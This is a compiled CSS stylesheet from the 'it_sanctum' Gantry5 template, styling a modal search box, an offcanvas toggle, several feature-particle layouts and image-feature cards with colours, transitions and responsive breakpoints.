/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input::-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:-ms-input-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 80, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:focus {
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 1);
}
/* line 86, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 87, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field {
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #fff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field::-webkit-input-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field::-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:-ms-input-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 101, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:focus {
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 1);
}
/* line 105, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form label {
  margin-bottom: 0;
}
/* line 108, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-submit {
  display: none;
}
/* line 113, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input {
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #fff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input::-webkit-input-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input::-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:-ms-input-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 127, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:focus {
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 1);
}
/* line 132, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-close {
  color: #fff !important;
  opacity: 1;
  font-size: 22px;
  top: 35px;
  right: 35px;
  position: absolute;
  -webkit-transform: scale(0);
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -o-transform: scale(0);
  transform: scale(0);
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
/* line 141, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-close:hover {
  -webkit-transform: rotate(90deg);
  -moz-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  -o-transform: rotate(90deg);
  transform: rotate(90deg);
  color: #4f953b !important;
}
/* line 149, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container .element-invisible {
  border: 0 none;
  height: 1px;
  margin: 0;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}
/* line 158, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container i {
  opacity: 1 !important;
}
/* line 1, templates/it_sanctum/scss/sanctum/_offcanvas-toggle.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_offcanvas-toggle.scss */
.offcanvas-toggle-particle.g-offcanvas-toggle {
  display: block;
  position: relative;
  top: auto;
  left: auto;
  right: auto;
  color: inherit;
  font-size: inherit;
  line-height: inherit;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 13, templates/it_sanctum/scss/sanctum/_offcanvas-toggle.scss */
.offcanvas-toggle-particle i {
  opacity: 1 !important;
}
/* line 7, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle, .g-features2-particle {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-grid, .g-features2-particle .g-grid {
  margin-bottom: 2.3445rem;
}
/* line 12, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-grid:last-child, .g-features2-particle .g-grid:last-child {
  margin-bottom: 0;
}
/* line 14, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 15, templates/it_sanctum/scss/sanctum/_features-particle.scss */
@media only all and (max-width: 47.938rem) {
  .g-features-particle .g-grid:last-child .g-features-particle-item:last-child, .g-features2-particle .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle .g-grid, .g-features2-particle .g-grid {
    margin-bottom: 0;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_features-particle.scss */
@media only all and (max-width: 47.938rem) {
  .g-features-particle .g-features-particle-item, .g-features2-particle .g-features-particle-item, .g-features-particle .g-features2-particle-item, .g-features2-particle .g-features2-particle-item {
    margin-bottom: 2.3445rem;
  }
}
/* line 31, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .size-33, .g-features2-particle .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle .size-33, .g-features2-particle .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 40, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .size-16, .g-features2-particle .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle .size-16, .g-features2-particle .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 48, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-content, .g-features2-particle .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 53, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle p, .g-features2-particle p {
  margin: 0;
}
/* line 56, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-button, .g-features2-particle .g-features-particle-button, .g-features-particle .g-features-particle-subs, .g-features2-particle .g-features-particle-subs {
  margin-top: 20px;
}
/* line 62, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle {
  text-align: center;
}
/* line 64, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-title {
  margin-top: 0.75rem;
  margin-bottom: 1rem;
}
/* line 67, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-title a {
  color: #282828;
}
/* line 69, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-title a:hover {
  color: #4f953b;
}
/* line 74, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-icon, .g-features-particle .g-circle-border {
  border-radius: 50%;
  font-size: 2rem;
  height: 100px;
  width: 100px;
  line-height: 100px;
  text-align: center;
  vertical-align: middle;
  margin-bottom: 0.75rem;
  color: #4f953b;
  position: relative;
  display: inline-block;
  -webkit-transition: all 0.2s linear 0s;
  -moz-transition: all 0.2s linear 0s;
  transition: all 0.2s linear 0s;
}
/* line 88, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-circle-border {
  background: transparent none repeat scroll 0 0;
  border: 1px solid #ddd;
  height: 98px;
  width: 98px;
  left: 1px;
  top: 1px;
  z-index: 1;
  position: absolute;
  -webkit-transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
  -moz-transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
  transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
}
/* line 99, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-image {
  margin-bottom: 0.75rem;
  display: inline-block;
}
/* line 103, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 104, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 105, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 106, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-item .g-content:hover .g-features-particle-icon {
  color: #fff;
  background: #4f953b;
}
/* line 110, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-item .g-content:hover .g-circle-border {
  border-color: #4f953b;
  -webkit-transform: scale(1.18);
  -moz-transform: scale(1.18);
  -ms-transform: scale(1.18);
  -o-transform: scale(1.18);
  transform: scale(1.18);
  -webkit-transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
  -moz-transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
  transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
}
/* line 119, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 120, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-grid {
  margin-bottom: 1.876rem;
}
/* line 122, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-grid .g-block {
  padding: 0 0.938rem;
}
/* line 125, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-grid:last-child {
  margin-bottom: 0;
}
/* line 127, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 128, templates/it_sanctum/scss/sanctum/_features-particle.scss */
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style6 .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style6 .g-grid {
    margin-bottom: 0;
  }
}
/* line 139, templates/it_sanctum/scss/sanctum/_features-particle.scss */
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style6 .g-features-particle-item {
    margin-bottom: 1.876rem;
  }
}
/* line 144, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-content {
  padding: 3rem 2.5rem;
  background: #fff;
  border: 1px solid #ddd;
}
/* line 149, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-features-particle-icon, .g-features-particle.style6 .g-features-particle-image {
  margin-bottom: 1.25rem;
}
/* line 152, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-features-particle-title {
  margin-bottom: 1.5rem;
}
/* line 155, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-features-particle-button, .g-features-particle.style6 .g-features-particle-subs {
  margin-top: 30px;
}
/* line 158, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-subs-item {
  padding: 10px 0;
  border-bottom: 1px solid #ddd;
}
/* line 161, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-subs-item:last-child {
  border-bottom: none;
}
/* line 166, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 167, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-grid {
  margin-bottom: 1.876rem;
}
/* line 169, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-grid .g-block {
  padding: 0 0.938rem;
}
/* line 172, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-grid:last-child {
  margin-bottom: 0;
}
/* line 174, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 175, templates/it_sanctum/scss/sanctum/_features-particle.scss */
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style7 .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style7 .g-grid {
    margin-bottom: 0;
  }
}
/* line 186, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-item {
  margin-top: 40px;
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style7 .g-features-particle-item {
    margin-bottom: 1.876rem;
  }
}
/* line 192, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-content {
  padding: 25px;
  background: #fff;
  border: 1px solid #ddd;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
/* line 197, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-content:hover {
  border-color: #282828;
}
/* line 199, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-content:hover .g-features-particle-icon {
  background: #282828;
}
/* line 204, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-item-inner {
  margin-top: -64px;
}
/* line 207, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-icon, .g-features-particle.style7 .g-features-particle-image {
  margin-bottom: 1.25rem;
}
/* line 209, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-icon .g-circle-border, .g-features-particle.style7 .g-features-particle-image .g-circle-border {
  display: none;
}
/* line 213, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-icon {
  width: 75px;
  height: 75px;
  line-height: 75px;
  border-radius: 0;
  background: #4f953b;
  color: #fff;
  font-size: 24px;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
/* line 223, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-title {
  margin-bottom: 1rem;
  text-transform: uppercase;
}
/* line 227, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-button, .g-features-particle.style7 .g-features-particle-subs {
  margin-top: 30px;
}
/* line 230, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-subs-item {
  padding: 10px 0;
  border-bottom: 1px solid #ddd;
}
/* line 233, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-subs-item:last-child {
  border-bottom: none;
}
/* line 238, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 {
  margin-left: 0;
  margin-right: 0;
  color: #fff;
  text-align: left;
}
/* line 243, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-grid {
  margin-bottom: 0;
}
/* line 245, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 246, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-grid:last-child .g-features-particle-item {
  box-shadow: -20px 0 20px -20px rgba(0, 0, 0, 0.07) inset;
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style8 .g-grid:last-child .g-features-particle-item {
    box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
  }
}
/* line 251, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-grid:last-child .g-features-particle-item:last-child {
  box-shadow: 0 0 20px -20px rgba(0, 0, 0, 0.07) inset;
}
/* line 257, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item {
  padding: 35px 30px 40px;
  box-shadow: -20px -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
}
/* line 260, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(1) {
  background: #40782f;
}
/* line 263, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(2) {
  background: #478635;
}
/* line 266, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(3) {
  background: #4f953b;
}
/* line 269, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(4) {
  background: #57a441;
}
/* line 272, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(5) {
  background: #5eb247;
}
/* line 275, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(6) {
  background: #6abb53;
}
/* line 278, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:last-child {
  box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style8 .g-features-particle-item {
    box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
    margin-bottom: 0;
  }
}
/* line 286, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-icon, .g-features-particle.style8 .g-features-particle-image {
  margin-bottom: 10px;
  color: #fff;
  border-radius: 0;
  width: auto;
  height: auto;
  line-height: inherit;
  font-size: 40px;
}
/* line 295, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-icon .g-circle-border, .g-features-particle.style8 .g-features-particle-image .g-circle-border {
  display: none;
}
/* line 299, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-title {
  color: #fff !important;
  font-size: 1.35rem;
}
/* line 302, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-title a {
  color: #fff;
}
/* line 304, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-title a:hover {
  text-decoration: underline;
}
/* line 309, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-desc, .g-features-particle.style8 .g-features-particle-subs {
  opacity: 0.85;
}
/* line 312, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-button {
  margin-top: 25px;
}
/* line 314, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-button .button {
  background: none;
  border: 2px solid #fff;
  color: #fff;
  border-radius: 50px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 320, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-button .button:hover {
  background: #282828;
  border-color: #282828;
}
/* line 326, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8.pull-up {
  margin-top: -7.5rem;
  position: relative;
  z-index: 4;
}
/* line 335, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 336, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle .g-features2-particle-title {
  margin-top: 0;
  margin-bottom: 1rem;
}
/* line 339, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle .g-features2-particle-title a {
  color: #282828;
}
/* line 341, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle .g-features2-particle-title a:hover {
  color: #4f953b;
}
/* line 346, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle .g-features2-particle-icon {
  margin-right: 20px;
  color: #4f953b;
  font-size: 130%;
}
/* line 351, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle .g-features2-particle-image {
  margin-right: 20px;
  display: inline-block;
}
/* line 355, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 356, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 357, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style3 .g-grid .g-block {
  padding: 0 1rem;
}
/* line 361, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style3 .g-content {
  padding-top: 1rem;
  padding-bottom: 1rem;
  background: rgba(0, 0, 0, 0.2);
}
/* line 365, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style3 .g-content:after {
  content: "";
  width: 0;
  height: 0;
  border-top: 15px solid rgba(0, 0, 0, 0.2);
  border-right: 15px solid transparent;
  position: absolute;
  margin-top: 16px;
  margin-left: -15px;
  z-index: 99;
}
/* line 378, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 379, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .g-features2-particle-icon {
  float: left;
  font-size: 55px;
  margin-right: 0;
  color: #bbb;
}
/* line 385, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .g-features2-particle-image {
  float: left;
  margin: 5px 0 0;
  max-width: 60px;
}
/* line 390, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .g-title-desc-container {
  margin-left: 75px;
}
/* line 393, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .g-features2-particle-title {
  margin-bottom: 10px;
}
/* line 396, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 397, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .accent1 .g-features2-particle-icon {
  color: #4f953b;
}
/* line 401, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 402, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .accent2 .g-features2-particle-icon {
  color: #282828;
}
/* line 407, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 408, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .g-features2-particle-icon {
  float: left;
  font-size: 24px;
  margin-right: 0;
  color: #afafaf;
  width: 60px;
  height: 60px;
  line-height: 60px;
  text-align: center;
  margin-top: 5px;
  border: 1px solid;
  border-radius: 50%;
}
/* line 421, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .g-features2-particle-image {
  float: left;
  margin: 5px 0 0;
  width: 60px;
  height: 60px;
}
/* line 426, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .g-features2-particle-image img {
  border-radius: 50%;
  width: 60px;
  height: 60px;
}
/* line 432, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .g-title-desc-container {
  margin-left: 75px;
}
/* line 435, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .g-features2-particle-title {
  margin-bottom: 10px;
}
/* line 438, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 439, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .accent1 .g-features2-particle-icon {
  color: #4f953b;
}
/* line 443, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 444, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .accent2 .g-features2-particle-icon {
  color: #282828;
}
/* line 4, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 7, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-grid {
  margin-bottom: 1.876rem;
}
/* line 9, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-grid:last-child {
  margin-bottom: 0;
}
/* line 11, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 12, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 13, templates/it_sanctum/scss/sanctum/_image-features.scss */
@media only all and (max-width: 47.938rem) {
  .g-image-features .g-grid:last-child .g-block:last-child .g-image-features-item {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-image-features .g-grid {
    margin-bottom: 0;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 27, templates/it_sanctum/scss/sanctum/_image-features.scss */
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-image-features > .g-grid > .g-block {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    margin-bottom: 1.876rem;
  }
  /* line 31, templates/it_sanctum/scss/sanctum/_image-features.scss */
  .g-image-features > .g-grid > .g-block:last-child {
    margin-bottom: 0;
  }
}
/* line 37, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-item {
  background: #fff;
  border: 1px solid #e2e2e2;
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.07);
  border-radius: 3px;
}
@media only all and (max-width: 47.938rem) {
  .g-image-features .g-image-features-item {
    margin-bottom: 2.3445rem;
  }
}
/* line 50, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 51, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 52, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-item.layout-right .g-image-features-image.uk-overlay {
  border-radius: 0 3px 3px 0;
}
/* line 55, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-item.layout-right .g-image-features-image img {
  border-radius: 0 3px 3px 0;
}
/* line 61, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image {
  position: relative;
}
/* line 63, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image img {
  width: 100%;
  border-radius: 3px 0 0 3px;
}
/* line 67, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 68, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image .uk-overlay-icon:before {
  content: "\f0c1";
}
/* line 72, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image.uk-overlay {
  border-radius: 3px 0 0 3px;
}
/* line 74, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image.uk-overlay img {
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
/* line 78, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 79, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 80, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image:hover.uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
/* line 85, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image .uk-overlay-panel {
  z-index: 4;
}
/* line 89, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-content {
  padding: 20px;
}
/* line 92, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-desc {
  margin: 0;
}
/* line 95, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-title {
  margin-top: 0;
  margin-bottom: 1rem;
}
/* line 98, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-title a {
  color: #282828;
}
/* line 100, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-title a:hover {
  color: #4f953b;
}
